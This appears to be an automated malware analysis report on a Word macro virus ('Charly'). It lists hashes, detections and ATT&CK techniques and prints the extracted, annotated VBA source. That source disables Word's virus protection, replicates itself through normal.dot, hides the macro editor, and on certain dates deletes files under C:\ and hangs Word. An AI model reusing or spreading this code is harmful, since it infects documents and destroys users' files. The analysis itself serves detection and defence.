Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 9fd4bfb080b33633…

MALICIOUS

Office (OLE)

44.0 KB Created: 2000-04-25 04:27:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1e32e7f44872269a3f4c0e5388b727bd SHA-1: eddcad237da67bb1862ef29d7ae49b558eb450ea SHA-256: 9fd4bfb080b3363374053a96e5099de02cdc47c74174367456979f37a6d45afe
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

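The sample contains legacy WordBasic macros, specifically AutoOpen and AutoClose, which are indicative of older macro viruses that infect documents. The extracted source bears this out: the AutoOpen module turns off Word's macro virus protection (Options.VirusProtection = False), copies itself and a second module between the opened document and the global template (normal.dot), and then calls the 'CHARLY_32' module each time it runs. CHARLY_32 is date-triggered: on the dates it checks, it inserts text into the document and calls a routine named KILLER that deletes files (Kill "C:\*.*"). These macros, together with the ClamAV detection, strongly suggest a malicious document designed for propagation.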

Heuristics 5

  • ClamAV: Doc.Trojan.Nottice-6 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Nottice-6
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6788 bytes
SHA-256: 9ff08635cee224c8dc38b2a33f23a64fae8c6374141c7378aa5a8867b1d7d5cc
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "AutoOpen"
'VIRUS CHARLY  Ver 3.2 Copyright  Lima - Perú 1998. Actualizado el 31 de Mayo 1999
'Fué creado el 1 de Dic. de 1998 por CharlySoft. Está protegido por las leyes del
'derecho de autor; cualquier intento de copia sera sancionada drásticamente.
' --------->        Je Je Je...      Carlos Javier T.A.
' Entry point of the "AutoOpen" module. It lowers Word's defences, works out
' whether it is running from the global template or from a document, copies
' the macros in the other direction if the target is not yet marked, and then
' always calls the CHARLY_32 module.
' Analyst note: the VirusProtection change and the macro names AutoOpen /
' AutoClose / CHARLY_32 are the host-side indicators visible in this routine.
Sub Main()
' Suppress alert dialogs and switch off Word's macro virus warning.
Application.DisplayAlerts = wdAlertsNone
Options.VirusProtection = False
' Clear any pending error, then route every later error to SALIDA
' (Spanish: "exit"), so a failed copy still reaches the CHARLY_32 call.
Dim Cjt$: On Error GoTo -1: On Error GoTo SALIDA
' NOTE(review): argument 0 presumably re-enables auto macros - confirm
' against WordBasic documentation.
WordBasic.DisableAutoMacros 0
' Last 10 characters, lower-cased, of the file that hosts the running macro;
' "normal.dot" is exactly 10 characters long.
Cjt$ = LCase(WordBasic.[Right$](WordBasic.[MacroFileName$](WordBasic.[MacroName$](0)), 10))
If Cjt$ = "normal.dot" Then
   ' Running from the global template: copy to the document unless
   ' INFECTA_D reports the CHARLY_32 marker is already there.
   If INFECTA_D = 1 Then
      GoTo SALIDA
   Else
      InfectaDOC
   End If
Else
   ' Running from a document: copy to the global template unless
   ' INFECTA_G reports the CHARLY_32 marker is already there.
   If INFECTA_G = 1 Then
      GoTo SALIDA
   Else
      InfectaGlobal
   End If
End If
' Reached on every path (skip, success, or error): hand over to CHARLY_32.
SALIDA:
WordBasic.Call "CHARLY_32"
End Sub
' Shows the CharlyForm user form (the form itself is not part of this preview).
' NOTE(review): the name looks like the Spanish-localized Tools > Macro command,
' so this presumably replaces the macro dialog to hinder inspection - confirm.
Sub HerramMacro()
    CharlyForm.Show
End Sub
' Intentionally empty procedure.
' NOTE(review): ViewVBCode is presumably Word's built-in command for opening
' the code editor; an empty Sub with that name would turn it into a no-op so
' the user cannot view the macro source - confirm.
Sub ViewVBCode()
    
End Sub
' Infection-marker check used before copying into a document.
' Returns 1 if any macro listed by CountMacros(1) is named "CHARLY_32",
' otherwise 0.
' NOTE(review): context 1 presumably means the active document/template -
' confirm against WordBasic documentation.
Private Function INFECTA_D()
Dim i
INFECTA_D = 0
If WordBasic.CountMacros(1) > 0 Then
   ' Scan every macro name in that context for the marker module.
   For i = 1 To WordBasic.CountMacros(1)
     If WordBasic.[MacroName$](i, 1) = "CHARLY_32" Then INFECTA_D = 1
   Next i
End If
End Function
' Infection-marker check used before copying into the global template.
' Returns 1 if any macro listed by CountMacros(0) is named "CHARLY_32",
' otherwise 0.
' NOTE(review): context 0 presumably means the global (Normal) template -
' confirm against WordBasic documentation.
Private Function INFECTA_G()
Dim i
INFECTA_G = 0
If WordBasic.CountMacros(0) > 0 Then
   ' Scan every macro name in that context for the marker module.
   For i = 1 To WordBasic.CountMacros(0)
     If WordBasic.[MacroName$](i, 0) = "CHARLY_32" Then INFECTA_G = 1
   Next i
End If
End Function
' Template-to-document replication step, called by Main when the code is
' running from normal.dot and the active document has no CHARLY_32 macro.
' Analyst note: after this runs the document carries AutoOpen, CHARLY_32 and
' the CharlyForm project item.
Private Sub InfectaDOC()
' NOTE(review): Format:=1 presumably saves the document as a template, which
' old Word required before a file could hold macros - confirm.
WordBasic.FileSaveAs Format:=1
' The template's AutoClose macro is stored in the document as AutoOpen.
WordBasic.MacroCopy "Global:AutoClose", WordBasic.[FileName$]() + ":AutoOpen"
WordBasic.MacroCopy "Global:CHARLY_32", WordBasic.[FileName$]() + ":CHARLY_32"
' Copy the CharlyForm project item from the Normal template to the document.
Application.OrganizerCopy Source:=NormalTemplate.FullName, Destination:=ActiveDocument.FullName, Name:="CharlyForm", Object:=wdOrganizerObjectProjectItems
' NOTE(review): the arguments presumably save all open files without
' prompting - confirm.
WordBasic.FileSaveAll 1, 1
End Sub
' Document-to-template replication step, called by Main when the code is
' running from a document and the global template has no CHARLY_32 macro.
' Analyst note: after this runs the global template carries AutoClose,
' CHARLY_32 and the CharlyForm project item.
Private Sub InfectaGlobal()
' The document's AutoOpen macro is stored in the global template as AutoClose.
WordBasic.MacroCopy WordBasic.[FileName$]() + ":AutoOpen", "Global:AutoClose"
WordBasic.MacroCopy WordBasic.[FileName$]() + ":CHARLY_32", "Global:CHARLY_32"
' Copy the CharlyForm project item from the document to the Normal template.
Application.OrganizerCopy Source:=ActiveDocument.FullName, Destination:=NormalTemplate.FullName, Name:="CharlyForm", Object:=wdOrganizerObjectProjectItems
' NOTE(review): the arguments presumably control prompting and format for
' the save of all open files - confirm.
WordBasic.FileSaveAll 1, 0
End Sub

Attribute VB_Name = "CHARLY_32"
' Module-level string set before each FORMATO call (FORMATO is not shown in
' this preview; presumably it formats and inserts Texto - confirm).
Dim Texto As String
' Date-triggered payload of the CHARLY_32 module, called from the AutoOpen
' module on every run. On any other date it does nothing and returns.
' On a trigger date it inserts text into the document, calls EMAIL and KILLER
' (KILLER is the file-deletion routine that follows this procedure), and then
' loops forever, so Word stops responding.
Public Sub Main()
Attribute Main.VB_Description = "Macro creada el 01/12/98 por mi%\r\n"
Attribute Main.VB_ProcData.VB_Invoke_Func = "Project.CHARLYTO.MAIN"
' Read the current weekday, day of month and month once.
Set Wb = WordBasic: WkDia = WordBasic.WeekDay(WordBasic.Now()): Dia = WordBasic.Day(WordBasic.Now()): MES = WordBasic.Month(WordBasic.Now())
' Trigger 1: 19 May or 23 May.
If (Dia = 19 Or Dia = 23) And MES = 5 Then
 If Dia = 23 Then
   Texto = "FELIZ CUMPLEAÑOS CHARLY": FORMATO
   ' Inserts the current year minus 1978 as an age.
   Wb.Insert "CHARLY Cumple " + Str(Wb.Year(Wb.Now()) - 1978) + " Hoy"
   Wb.InsertPara: Wb.InsertPara
   Wb.Insert "***Lima - Perú (VIRUS CHARLY)***": EMAIL
 Else
   Texto = "FELICIDADES POR TU CUMPLEAÑOS MINI": FORMATO
   Wb.Insert "En Homenaje a mi Querida Hermanita.   "
   Wb.FormatFont Points:="24", Color:=2: Wb.Insert ": "
   Wb.FormatFont Points:="18", Color:=6: Wb.Insert ")"
   Wb.InsertPara: Wb.InsertPara
   Wb.Insert "***Lima - Perú (VIRUS CHARLY)***": EMAIL
 End If
   ' Destructive step, then an endless loop; the ExitWindows call on the
   ' label line is commented out in the sample.
   KILLER
INFINITO:    'Tasks.ExitWindows
   GoTo INFINITO
End If       '***FECHAS ESPECIALES*** (Spanish: "special dates")
' Trigger 2: day 4, 11 or 31 of any month, day 13 when WeekDay returns 6
' (presumably Friday the 13th - confirm the weekday numbering), 17 March,
' or 25 December.
If Dia = 4 Or Dia = 11 Or (Dia = 13 And WkDia = 6) Or Dia = 31 Or (Dia = 17 And MES = 3) Or (Dia = 25 And MES = 12) Then
   ' Only the day is tested here, so the 17 and 25 messages depend on the
   ' outer condition having matched that day.
   If Dia = 17 Then
      Texto = "Maldita Cecilia; Arruinastes mi Vida...": FORMATO
   ElseIf Dia = 25 Then
      Texto = "FELIZ NAVIDAD .... Je Je Je": FORMATO
      Wb.Insert "Les Desea C.J.T.A."
   End If
   Texto = " ***Lima - Perú (VIRUS CHARLY)***": FORMATO
   EMAIL
   KILLER
' Jumps to the INFINITO label inside the first If block: same endless loop.
GoTo INFINITO
End If
End Sub
Private Function KILLER() '***Elimina archivos***
On Error Resume Next: Kill "C:\*.*"
On Error Resume Next: Kill "C:\Wind
... (truncated)